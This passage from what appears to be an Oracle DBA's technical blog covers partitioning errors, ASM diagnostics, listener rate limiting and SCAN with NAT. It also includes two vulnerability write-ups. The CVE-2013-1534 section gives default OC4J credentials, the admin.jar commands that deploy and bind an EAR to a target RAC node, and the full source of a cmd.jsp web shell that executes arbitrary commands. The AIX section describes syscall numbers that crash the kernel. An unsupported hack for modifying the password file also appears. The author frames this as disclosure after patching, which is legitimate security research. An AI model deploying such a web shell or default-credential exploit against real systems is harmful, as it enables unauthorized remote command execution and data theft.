  partition p2000_03 values less than (TO_DATE('01.03.2000', 'DD.MM.YYYY')),
  partition p2000_04 values less than (TO_DATE('01.04.2000', 'DD.MM.YYYY')),
  partition p2000_05 values less than (TO_DATE('01.05.2000', 'DD.MM.YYYY')),
  partition p2000_06 values less than (TO_DATE('01.06.2000', 'DD.MM.YYYY'))
); 

Table created.

DBA1@test3> select table_name, segment_created from dba_tables where table_name='T1';

TABLE_NAME                     SEG
------------------------------ ---
T1                             N/A

DBA1@test3> select partition_name, segment_created from dba_tab_partitions where table_name='T1';

PARTITION_NAME                 SEGM
------------------------------ ----
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO

6 rows selected.

DBA1@test3>

Now let’s load a single, very large current partition, so that indexing it will take some time:

DBA1@test3> insert  /*+ APPEND NOLOGGING */ into t1 (id, ts, txt) SELECT level, sysdate, 'blah' FROM dual CONNECT BY LEVEL <= 2500000;

2500000 rows created.

DBA1@test3> commit;

Commit complete.

DBA1@test3>

So far we have a partition with a segment size of approximately ~73MB (with 8kB DB blocks).

DBA1@test3> select p.partition_name, p.segment_created, s.bytes/1024 kb from dba_tab_partitions p left join dba_segments s on (p.partition_name=s.partition_name and p.table_name=s.segment_name) where p.table_name='T1' order by 2,1;

PARTITION_NAME                 SEGM         KB
------------------------------ ---- ----------
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO
SYS_P17066                     YES       73728

7 rows selected.

Now, in our 1st session, we start building the online local index using “create index t1_i1 on t1 (ts, txt) local online”, immediately followed (from another session) by an attempt to insert a single row into one of the P2000_xx partitions (which have no backing segments initialized at this point):

DBA1@test3> insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest');
insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest')
            *
ERROR at line 1:
ORA-14765: Cannot create a partition while doing a create index

DBA1@test3>

Summary: CREATE INDEX ONLINE is not fully compatible with sessions performing DML against (sub)partitions that do not come with pre-allocated segments. There is a very likely possibility of running into ORA-14765 on Oracle transactional systems, especially those creating numerous automatically managed (sub)partitions based on some template (like interval range partitions that are subpartitioned by ID). Of course you may want to avoid deferred segment creation (and sacrifice a lot of storage space), or live with the risk of hitting those errors while building indexes (hopefully the application can just retry at a later stage).

A new, completely unsupported way of increasing ORAPWD entries

March 14th, 2014

FYI, I’ve just “invented” a completely new way of increasing the capacity of orapwd files online that does not require knowing the SYS password (this is needed once you hit ORA-1996 after trying to grant an additional SYSDBA). As you probably know, the hard limit on the number of entries is set when a new orapw file is created, and recreating the file requires changing the SYS password. Apparently this hack seems to work (TM), but don’t try this at home or on any production system:

[oracle@t10050 dbs]$ cp orapwdtest4  orapwdtest4.old # make backup
[oracle@t10050 dbs]$ ls -l orapwdtest4 # save the file size in bytes as SIZE1
[oracle@t10050 dbs]$ orapwd file=/tmp/remove entries=20
Enter password for SYS: anything
[oracle@t10050 dbs]$ ls -l /tmp/remove # file size will be approx 3584 bytes on Linux x86_64, if you compare it to the default orapwd , you will realize it is bigger by 2048 bytes
[oracle@t10050 dbs]$ dd if=/dev/zero of=/tmp/empty.2k bs=1k count=2
[oracle@t10050 dbs]$ cat /tmp/empty.2k >> orapwdtest4

Done! Brief tests show that it works and that you can add more working SYSDBA accounts; removal works OK too, but again, DO NOT TRY THIS ON PRODUCTION, as the internal orapwd structure is unknown to me ;)
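
A quick way to verify the result from SQL*Plus is to look at V$PWFILE_USERS before and after granting a new SYSDBA (the user name below is just an example):

-- entries currently stored in the password file
SELECT username, sysdba, sysoper FROM v$pwfile_users;

-- this is what fails with ORA-1996 once the file is full,
-- and should succeed after the file has been "extended"
GRANT SYSDBA TO some_dba_user;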

CVE-2013-1534: remote command execution on Oracle RAC (Grid Infrastructure >= 11.2.0.[23].0 till PSU/CPU Apr2013)

January 23rd, 2014

In April 2013 Oracle fixed CVE-2013-1534, an attack that I’m going to describe here as the person who originally found it in February 2012 (it was a 0-day for more than a year). For official information please see the Critical Patch Update April 2013. One thing though: I do not agree with Oracle scoring it at 7.5. The statement goes like this: “For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial+.” Basically this is a remote attack that gains Oracle Grid Infrastructure owner privileges (basically “oracle”/“dba” in 99% of cases) on clustered (RAC) Oracle databases, which gives you read/write access to *all* data. Here I’m following responsible disclosure (vendor notified, fix released, clients alerted)… many, many months later I think all responsible people who care have already patched their Oracle RAC systems. For Patch Set 11.2.0.3.x this means it has been fixed via Grid Infrastructure + DB PSU (Patch Set Update) >= 11.2.0.3.6 (the current PSU is 11.2.0.3.9; for 11.2.0.3.6 the recommended Oracle Alert doc ID is 1525152.1: Patch Set Update and Critical Patch Update April 2013 Availability Document).

Starting with Grid Infrastructure 11gR2 (technically 11.2.0.1), Oracle added something like Quality of Service (QoS) Management for Databases, which in practice gives DBAs the ability to better distribute resource usage between cluster nodes in line with business requirements. SLAs are managed by the newly introduced QoS functionality by placing workloads on “server pools”. QoS in 11.2.0.1 was not fully activated, but starting with Grid Infrastructure 11.2.0.2 it is online by default, without any confirmation; it is also activated by default on any upgrade.

QoS on RAC/Grid Infrastructure is partially implemented by an embedded Oracle Containers for Java (OC4J) instance.

The qosadmin account (always with the default password of “oracle112” per the Oracle documentation, on every install) always has the oc4j-administrators role assigned in /u01/app/11.2.0/grid/oc4j/j2ee/home/OC4J_DBWLM_config ($GRID_HOME/oc4j/j2ee/home/OC4J_DBWLM_config), in the file system-jazn-data.xml (JAZN stands for Java AuthoriZatioN). The same security configuration file is also used to control whether a username:password pair is authorized to deploy any J2EE application.

This means that OC4J allows arbitrary command execution on any Oracle clustered (RAC) database running on top of Oracle Clusterware (AKA Grid Infrastructure) >= 11.2.0.2 until the April 2013 CPU (PSU) has been applied. This affects both customers using QoS and those not using it, because the OC4J service (serving an HTTP interface on port 8888) is always enabled by definition. The attack would by definition use the “qosadmin” account… The QoS for RAC documentation (which nobody reads, because it is a “new” feature and nobody runs anything like this in production yet) states that the password for “qosadmin” should be changed because it may be used for QoS-related functionality. The remaining functionality appears disabled simply because it was never configured… but there’s more.

What’s more interesting is that there is a second account named “oc4jadmin” (the typical default OC4J admin); after brute-forcing, it also appears to be set to “oracle112”… on every installation out there… and you won’t find a single line in the official RAC documentation saying that this “backdoor” should be disabled. So, in summary, every RAC >= 11.2.0.2.0 on this planet has the same passwords set for uploading J2EE applications remotely over RMI (a Java thing). The oc4jadmin account is also assigned the oc4j-administrators role.

Some more details:
a) platform independent (100% success rate) exploitation vector
b) arbitrary command execution
c) gives UID of Oracle Grid Infrastructure software owner (typically “oracle” [1] or “grid” [2])
d) affects RAC >= 11.2.0.2, >= 11.2.0.3, has been tested on
[*] 11.2.0.2.0 (linux x86_64),
[*] 11.2.0.3.0 (linux x86_64),
[*] 11.2.0.3.1 // CPU Jan2012
[*] 11.2.0.3.2 // CPU Apr2012
[*] 11.2.0.3.5 // CPU Jan2013
e) so by definition it will also work against flagship Oracle Exadata “Unbreakable” Database Machine (http://www.oracle.com/us/products/database/exadata/overview/index.html) as it utilizes Oracle RAC/Grid Infrastructure
f) this thing is remote
g) this thing does NOT require any sort of authentication (just plain TCP/IP connectivity to the servers is enough)
h) vulnerability is present in any installation of Oracle Grid Infrastructure >= 11.2.0.2.0
i) no social engineering is required at all
j) remote ports 23792 and 8888 need to be reachable on at least a single RAC node (the one running the RMI service)
k) it does NOT work against Oracle Restart (single server non-RAC Grid Infrastructure installation)

[1] – by being the “oracle” UNIX/Linux user one can connect “/ AS SYSDBA”, so it is a full compromise of the data (including modification). Additionally, because the compromise gives shell access, it is very easy to also defeat Oracle Database Vault (an additional option for segregating DBAs from users – think in terms of MAC vs DAC). If you are interested in defeating Oracle databases with the Vault option then I recommend the following link http://jakub.wartak.pl/blog/?p=92 :)

[2] – when the new 11gR2 feature “Role Separation” (which separates ASM/Grid/Clusterware admins from DBAs) is deployed, which is very rare, it is still possible to get root; I’ll blog about that in the future. That is probably why Oracle scored it CVSS 7.5, but the main point is that it is very rare to see the Grid Infrastructure owner separated from the Oracle RDBMS home owner.

….ooooOOOO Exploitation Demonstration OOOOoooo…..

OC4J provides the command-line utilities admin.jar and admin_client.jar. You can use either of them; however, I’ve only tested admin.jar (which of course is installed with any OC4J, including the RAC >= 11.2.0.2.0 software). Both JARs are actually just simple tools to upload a single EAR file and reconfigure the remote OC4J so that it starts serving requests for the uploaded applications under specific URLs. We are going to upload cmd.ear :) The best documentation on them comes directly from Oracle, e.g. here:
http://docs.oracle.com/cd/B31017_01/web.1013/b28951/overview.htm#CJAJHJIA

The easiest way to get admin.jar (though I’ve used the one coming with RAC) is to download it from the Oracle OC4J download page, as it contains the “OC4J Admin Client” (link http://www.oracle.com/technetwork/middleware/ias/downloads/101310-085449.html , 3 disks, 1.4GB total). You probably need to use an admin.jar/admin_client.jar as close as possible to the version of OC4J being attacked (e.g. using a 9.x.x admin.jar might fail to upload to RAC >= 11.2.0.2, as the OC4J embedded there is version 10.1.3, etc.). I would recommend installing it on an RHEL/OL-compatible Linux distribution if possible (due to the enterprise nature of Oracle software). Alternatively, you could probably use some ready-to-run RAC Virtual Machine Linux template from Oracle (works for me under XEN). I’ve also tried the generic Metasploit RMI uploaders (for JBoss, if I remember correctly) but failed (perhaps it’s possible, but IMHO there are easier ways).

Actually, it takes only 2 commands and 1 click to exploit this vulnerability. You do not need to write any tools/exploits; just execute a few commands to upload cmd.ear onto the vulnerable RAC installation, thanks to the default passwords being deployed.

1. Deploy/upload file (exploit) to vulnerable RAC cluster
————————————————————-

Detail: java -jar admin.jar ormi://<target>:23792 qosadmin oracle112  -deploy -file <path_cmd_exploit.ear> -deploymentName cmd

e.g.:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112  -deploy -file ~/cmd.ear -deploymentName cmd
Uploading file /root/cmd.ear to oc4j server side
[ 2012-06-08 08:14:39.290 EDT ] Application Deployer for cmd STARTS.
[ 2012-06-08 08:14:40.850 EDT ] Copy the archive to /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear
[ 2012-06-08 08:14:40.879 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear begins...
[ 2012-06-08 08:14:40.881 EDT ] Unpacking cmd.ear
[ 2012-06-08 08:14:40.887 EDT ] Done unpacking cmd.ear
[ 2012-06-08 08:14:40.895 EDT ] Unpacking cmd.war
[ 2012-06-08 08:14:40.905 EDT ] Done unpacking cmd.war
[ 2012-06-08 08:14:40.906 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear ends...
[ 2012-06-08 08:14:40.907 EDT ] Starting application : cmd
[ 2012-06-08 08:14:40.907 EDT ] Initializing ClassLoader(s)
[ 2012-06-08 08:14:40.908 EDT ] Initializing EJB container
[ 2012-06-08 08:14:40.909 EDT ] Loading connector(s)
[ 2012-06-08 08:14:40.921 EDT ] Starting up resource adapters
[ 2012-06-08 08:14:40.921 EDT ] Initializing EJB sessions
[ 2012-06-08 08:14:40.922 EDT ] Committing ClassLoader(s)
[ 2012-06-08 08:14:40.922 EDT ] Initialize cmd begins...
[ 2012-06-08 08:14:40.927 EDT ] Initialize cmd ends...
[ 2012-06-08 08:14:40.929 EDT ] Started application : cmd
[ 2012-06-08 08:14:40.932 EDT ] Application Deployer for cmd COMPLETES. Operation time: 1642 msecs

[root@attacker home]#

2. Now we bind EAR(application/exploit) to the URL of OC4J server
————————————————————————-
Once the J2EE (EAR) application has been deployed, you need to bind it to a visible URL:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112 -bindWebApp cmd cmd default-web-site /cmd
[root@attacker home]#

Basically, you can specify either qosadmin or oc4jadmin; as I stated earlier, it doesn’t matter.

3. Profit!
——————————————–
OK, open a web browser and go to the URL http://target:8888/cmd/cmd.jsp?cmd=id+-a , where target is the hostname of one of the RAC nodes.

Or, if you need a kick-ass web GUI interface to own someone: http://RACtarget:8888/cmd/

-J.

P.S. The cmd.jsp (and the EAR built from it – I’m not going to provide that) is very simple:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>

ASM diskgroup with negative disk sizes

January 7th, 2014

Sometimes, as a DBA, you will see strange signs along the way, like this one: an ASM +DATA diskgroup with no data and no files, yet with something taking up space (notice that Total_MB != Free_MB):

ASMCMD> lsdg
State    Type    Rebal  Sector  Block       AU  Total_MB  Free_MB  Req_mir_free_MB  Usable_file_MB  Offline_disks  Voting_files  Name
MOUNTED  EXTERN  N         512   4096  1048576   4095940  3271458                0         3271458              0             N  DATA/
MOUNTED  EXTERN  N         512   4096  1048576    102398   102304                0          102304              0             N  REDO/
MOUNTED  EXTERN  N         512   4096  1048576      1019      623                0             623              0             Y  SYSTEMDG/
ASMCMD> find +DATA *
ASMCMD> ls +DATA
ASMCMD> lsdsk
Path
/dev/oracleasm/disks/DATA_05
/dev/oracleasm/disks/DATA_06
/dev/oracleasm/disks/DATA_07
/dev/oracleasm/disks/DATA_08
/dev/oracleasm/disks/DATA_09
/dev/oracleasm/disks/DATA_10
/dev/oracleasm/disks/DATA_11
/dev/oracleasm/disks/DATA_12
/dev/oracleasm/disks/DATA_13
/dev/oracleasm/disks/DATA_14
/dev/oracleasm/disks/REDO_02
/dev/oracleasm/disks/SYSTEMDG_DISK01
ASMCMD>

A rebalance won’t help, the ASM logs are clean, and so you get more and more confused. The situation is a little awkward, but one can spot a negative (!) capacity (close to -2^32) on some ASM disks that were recently added:

ASMCMD> lsdsk -k -G DATA
Total_MB      Free_MB   OS_MB  Name       Failgroup  Failgroup_Type  Library  Label  UDID  Product  Redund   Path
  409594       409037  409594  DATA_0000  DATA_0000  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_05
  409594       408885  409594  DATA_0001  DATA_0001  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_06
  409594       408895  409594  DATA_0002  DATA_0002  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_07
  409594       408680  409594  DATA_0003  DATA_0003  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_08
  409594       408987  409594  DATA_0004  DATA_0004  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_09
  409594       408931  409594  DATA_0005  DATA_0005  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_10
  409594       409079  409594  DATA_0006  DATA_0006  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_11
  409594       408964  409594  DATA_0007  DATA_0007  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_12
  409594  -4294555512  409594  DATA_0008  DATA_0008  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_13
  409594  -4294554748  409594  DATA_0009  DATA_0009  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_14
ASMCMD>

To fix the problem one can drop the affected ASM disks and remove their ASMLib labels; the critical step is to reinitialize/overwrite with zeros (using dd from /dev/zero) a large header area on each affected LUN (at least 10MB), and afterwards re-add those disks (via ASMLib) to the diskgroup using the normal ALTER DISKGROUP … ADD DISK syntax. Afterwards you will see normal utilization in the diskgroup:

SQL> select name, state, type, total_mb, free_mb from v$asm_diskgroup;

NAME                           STATE       TYPE     TOTAL_MB    FREE_MB
------------------------------ ----------- ------ ---------- ----------
DATA                           MOUNTED     EXTERN    4095940    4090620
REDO                           MOUNTED     EXTERN     102398     102304
SYSTEMDG                       MOUNTED     EXTERN       1019        623

SQL>

Reason: the LUNs were probably not properly initialized (only 1MB had been overwritten), yet no errors were reported during the first initialization. Another strange thing on a, fortunately, non-critical development system :)
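
For completeness, the repair cycle described above could look roughly like this (disk names and paths are taken from the listings earlier; the dd target and size are illustrative, and the oracleasm steps assume ASMLib is in use – test it outside production first):

-- 1. drop the broken disks and let the rebalance finish
ALTER DISKGROUP data DROP DISK DATA_0008, DATA_0009 REBALANCE POWER 4;

-- 2. as root: remove the ASMLib labels and wipe a generous part of each header
--    # oracleasm deletedisk DATA_13
--    # dd if=/dev/zero of=/dev/mapper/lun_for_DATA_13 bs=1M count=10 oflag=direct
--    # oracleasm createdisk DATA_13 /dev/mapper/lun_for_DATA_13
--    (repeat for DATA_14)

-- 3. re-add the disks to the diskgroup
ALTER DISKGROUP data ADD DISK
  '/dev/oracleasm/disks/DATA_13',
  '/dev/oracleasm/disks/DATA_14';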

Oracle Certified Master 11g

December 3rd, 2013

Hi.

It is official now: I have successfully passed the Oracle Database 11g Administrator Certified Master exam (at the age of 28, I should add). It took a long time to prepare for it (years, counting from the start of my career as an Oracle DBA), which is why there have been almost no internals-like blog posts recently.

  • It’s one of the most advanced exams in IT for senior DBAs managing mission-critical 24×7 environments (the lifeblood of any big IT system these days).
  • The best place for information on this exam is the OCM page itself, but you will only fully realize that after the exam.
  • The costs are insane (OCA and OCP as prerequisites + 3 Oracle University trainings [$$$] + the cost of the 2-day exam [$$]).
  • The tempo of the practical exam is insane too: there is no time left for thinking; you are literally doing stuff faster than you can think about it, for 2 full days.
  • Mistakes cost a lot of time; it is all about skills and speed. If you have the skills but cannot complete a given Exam Topic within the time allotted for a single skill set, do not even bother thinking about the exam itself.
  • You are not allowed to lose your data, and I think it is fair to say that if you lose the database (or database availability for too long) you are out of the exam. This is tested, but as I’m under NDA I will not go into details.

The stress caused by the number of tasks to be performed, plus the stress of doing something wrong (the fear that you will damage your main production DB), plus the constant stress of something failing at random during the exam (hardware, deliberate actions) creates a truly unique atmosphere during those 2 days… It is like 4 years of growth of an Oracle-based IT system, with all its obstacles and challenges, compressed into 2 days.

RATE_LIMIT and Oracle RAC 11gR2?

November 4th, 2013

Oracle SQLNet/TNS connection rate limiting is an awesome way of increasing the stability of Oracle databases: it lets you control the insane behaviour of starting Application Servers or middleware components that push hundreds of connections to the database at once and thus kill the CPU on the database server (impacting other critical work). The way it works is also very important: it is not just refusing connections, it accept()s the socket but does not start processing it (the work is simply queued). For more detail see the official Oracle whitepaper, especially www.oracle.com/technetwork/database/enterprise-edition/oraclenetservices-connectionratelim-133050.pdf.
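On a plain single-instance setup the configuration itself is tiny; a minimal listener.ora sketch of what it might look like (the dbhost1 hostname and the 10 connections/second limit are just illustrative values, see the whitepaper above for the exact semantics):

CONNECTION_RATE_LISTENER = 10

LISTENER =
  (ADDRESS_LIST =
    (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost1)(PORT = 1521)(RATE_LIMIT = yes))
  )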

The way it works is important, because rejecting the TCP connections (via TCP FIN or TCP RST) would cause the application to get “Unable to get connection” type errors, which in most cases is not something you want for various reasons. And if this feature does not work, you will not be able to re-implement it in a different way, let’s say using Linux’s NetFilter, because there you can rate limit TCP connections primarily by dropping them.
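Just to illustrate the difference, a NetFilter-based “rate limit” would look roughly like the sketch below (the port and the numbers are only an example); anything above the limit is simply dropped, which is exactly the application-visible failure mode we want to avoid:

# accept at most 10 new connections per second to the listener port (burst of 20)
iptables -A INPUT -p tcp --dport 1521 --syn -m limit --limit 10/second --limit-burst 20 -j ACCEPT
# and drop everything above that rate, so clients see connect failures/timeouts
iptables -A INPUT -p tcp --dport 1521 --syn -j DROP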

You may be surprised to learn that rate limiting of Oracle SQLNet/TNS connections is NOT supported on RAC installations. The official documentation (http://docs.oracle.com/cd/E11882_01/network.112/e10835/listener.htm#NETRF008) is silent on this topic, but it has been confirmed through an Oracle SR with support. The probable primary reason is that in 11gR2 CRS manages both the normal and the SCAN listeners, so you have no real way of altering the Oracle-managed listener.ora and endpoints_listener.ora files because they get overwritten by the clusterware agent (see below)… yet the documentation still asks you to edit them. Clearly a conflict here.

On RAC/CRS the listeners are supposed to be altered only via the “srvctl” command; srvctl is really just a front-end, since from 11gR2 onwards the oraagent.bin daemon takes care of monitoring and housekeeping the listeners. The problem is that srvctl does NOT have a way to enable RATE_LIMIT, and there is also no option to alter more advanced parameters like QUEUESIZE (fortunately on Linux 2.6.x the listen() backlog depth seems to default to SOMAXCONN = /proc/sys/net/core/somaxconn = 128), SDU, etc. (those are actually mentioned in Bug 11782958 “SRVCTL DOES NOT SUPPORT LISTENER CONFIGURATION LIKE MODIFYING QUEUESIZE, SEND/RE” and in Doc ID 1292915.1 “Setting Parameters for Scan and Node Listeners on RAC, Queuesize, SDU, Ports, etc”).
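As a side note, on Linux you can roughly check the accept backlog actually in effect for a listening socket with ss (for sockets in LISTEN state the Send-Q column reports the configured backlog); 1521 is of course just the default listener port:

$ ss -ltn 'sport = :1521'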

Sample srvctl options for 11gR2:

[oracle@racnode1 ~]$ aso srvctl config listener -a
Name: LISTENER
Network: 1, Owner: oracle
Home: <CRS home>
  /u01/app/11.2.0/grid11203 on node(s) racnode1, racnode2
End points: TCP:1521
[oracle@racnode1 ~]$ aso srvctl modify listener -h

Modifies the configuration for the listener.

Usage: srvctl modify listener [-l <lsnr_name>] [-o <oracle_home>] [-p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"] [-u <oracle_user>] [-k <net_num>]
    -l <lsnr_name>           Listener name (default name is LISTENER)
    -o <oracle_home>         ORACLE_HOME path
    -p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"       Comma separated tcp ports or listener endpoints
    -u <oracle_user>         Oracle user
    -k <net_num>             network number (default number is 1)
    -h                       Print usage
[oracle@racnode1 ~]$

Additionally, Doc ID 1568591.1 “11gR2 Listener With RATE_LIMIT Set: Slow Connect Time and Tnsping Response Time High with TNS-1158 Error” mentions BUG:16409926 “LISTENER MEMORY LEAK IF RATE_LIMIT IS USED AND ENFORCED FREQUENTLY” (still not fixed in the 11.2.0.2.x and 11.2.0.3.x PSUs, but fixed in 12.1.0.1 and included from the start in 11.2.0.4.0). Overall this feature does not seem to be widely used and/or tested, and it does not leave a good feeling…

CVE-2012-0723: the world’s first AIX system call fuzzer and its interesting results

October 7th, 2013

I’ve been intrigued by so-called fuzzers for a long time, and some time ago I wanted to give them a try on AIX. Let’s take one of the most recent AIX releases I had at that time, e.g. 6.1 Technology Level #6 Service Pack #4 (btw, it works on 7.1.0.0 too):

$ oslevel -s
6100-06-04-1112
$ id
uid=100(guest) gid=100(usr)
$
$ ./ble
[After a while system reboots]

root@XYZ:# errpt -j 67145A39 -A
---------------------------------------------------------------------------
LABEL:          DUMP_STATS
Date/Time:       Fri Sep 16 05:06:17 EDT 2011
Type:            UNKN
Resource Name:   SYSDUMP
Description
SYSTEM DUMP
Detail Data
DUMP DEVICE
/dev/lv_dumplv
DUMP SIZE
             242688512
TIME
Fri Sep 16 05:04:31 2011
DUMP TYPE (1 = PRIMARY, 2 = SECONDARY)
           1
DUMP STATUS
           0
ERROR CODE
0000 0000 0000 0000
DUMP INTEGRITY
Compressed dump - Run dmpfmt with -c flag on dump after uncompressing.

FILE NAME

PROCESSOR ID
           0
root@XYZ:#

[..]

(0)> where
pvthread+011200 STACK:
[004CEB5C]rmsock+00001C (F3FCC00000000000 [??])
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9610

(0)>

On different system 6100-03-01-0921:

(0)> where
pvthread+00AF00 STACK:
[0043DCFC]rmsock+00001C (F3FC000000000000 [??])
[00003844].svc_instr+000144 ()
[kdb_get_virtual_memory] no real storage @ 2FF229D0
[10000590]10000590 ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9680
(0)>

As you can see above, it attempted random syscalls, but on rmsock() – executed by a non-privileged user – the system rebooted (because of attributes on the sys0 device that make the machine reboot in case of a kernel panic). A typical Denial of Service attack, isn’t it?

Now let’s try something more intelligent (found during the research) – using only syscall number 793 on version 6100-06-04-1112:

$ ./ble 793
using only sc=793

… and the system is dead. In an AIX kernel debugger session on the dump file after the reboot you can see that even the system call (svc) instruction handler seems not to be visible, perhaps indicating some kind of memory overwrite in kernel space. This could (probably) be exploited by finding the offset of the privilege/credential structure holding all the UIDs/GIDs:

(0)> where
pvthread+018C00 STACK:
[0001BF00]abend_trap+000000 ()
[000C585C]xm_bad_free+00025C (??, ??, ??, ??)
[000C4F30]xmfree+0004F0 (??, ??)
[046A7868]ptx_get_ndd_tree+000088 (??, ??, ??, ??, ??)
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9640

(0)>
[..]
(0)> ppid 06400D8
              SLOT NAME     STATE      PID    PPID          ADSPACE  CL #THS

pvproc+019000  100*ble      ACTIVE 06400D8 07700C8 0000000848B32480   0 0001

[..]
IDENTIFIER. uid        :00000064  ........... suid       :00000064
........... pid        :006400D8  ........... ppid       :007700C8
........... sid        :006E0092  ........... pgrp       :006400D8
[..]
(0)> nm pvproc
Symbol Address : F1000F0A00000000
   TOC Address : 02B65540

(0)>

So as you can see, the UID of our “ble” system call fuzzing process was 0x64 (or 100 if you are uncomfortable with hex notation). By changing the value at address 0xF1000F0A00000000+0x19000 one could probably get a root shell, but researching my way to do that could be very time intensive.

And a sample from the most recent AIX 7.1 release I had access to:

guest@hostA:# oslevel -s
7100-00-03-1115
guest@hostA:# ./ble 766
using only sc=766

… and the system is dead:

(2)> where
pvthread+011100 STACK:
[F1000000C01E06CC]dupb+00000C (0000000030CBEE17 [??])
[F1000000C01E05DC]dupmsg+00001C (??)
[00014D70].hkey_legacy_gate+00004C ()
[0000386C]ovlya_addr_sc_flih_main+00014C ()
[kdb_get_virtual_memory] no real storage @ FFFFFFFF3FFFE60
[kdb_read_mem] no real storage @ FFFFFFFFFFF95F0

(2)>

IBM was notified months ago, and a patch was released some time ago: http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc (affects AIX 5.3, 6.1 and 7.1, plus all VIOS releases too). Happy patching :)

-J.

Oracle RAC SCAN is not compatible with NAT (and thus with PCI DSS)

August 6th, 2013

Oracle Single Client Access Name (SCAN) – a single access point name for Oracle RAC instance VIPs – often seems to be problematic in environments that use NAT or have to comply with regulations such as PCI DSS:

  1. section 1.3.3 – “Do not allow any direct connections inbound or outbound for traffic between the Internet and the cardholder data environment”
  2. section 1.3.8 – “Do not disclose private IP addresses and routing information to unauthorized parties. Note: Methods to obscure IP addressing may include, but are not limited to: Network Address Translation (NAT) [..]“

The problem with giving external/internal parties access to Oracle RAC database clusters could basically be described as “Oracle SCAN incompatibility with Destination NAT/TCP proxies acting as network brokers”. Here is a simple successful connection example to the TNS_ENTRY1 alias (served via a single raccluster-scan SCAN VIP and the racnode1/racnode2 Oracle VIPs):

[someone@racnode1 ~]$ sqlplus doesnotexists@TNS_ENTRY1
[..]
[someone@racnode1 ~]$ grep -e nnftrne: -e niotns: -e nsc2addr: sqlnet_1696.trc
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:527] niotns: entry
(1002018528) [06-AUG-2013 09:58:30:527] niotns: niotns: setting up interrupt handler...
(1002018528) [06-AUG-2013 09:58:30:527] niotns: Not trying to enable dead connection detection.
(1002018528) [06-AUG-2013 09:58:30:528] niotns: Calling address: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=raccluster-scan)(PORT=1521))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone))))
(1002018528) [06-AUG-2013 09:58:30:529] nsc2addr: (DESCRIPTION=(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone)))(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.43)(PORT=1521)))
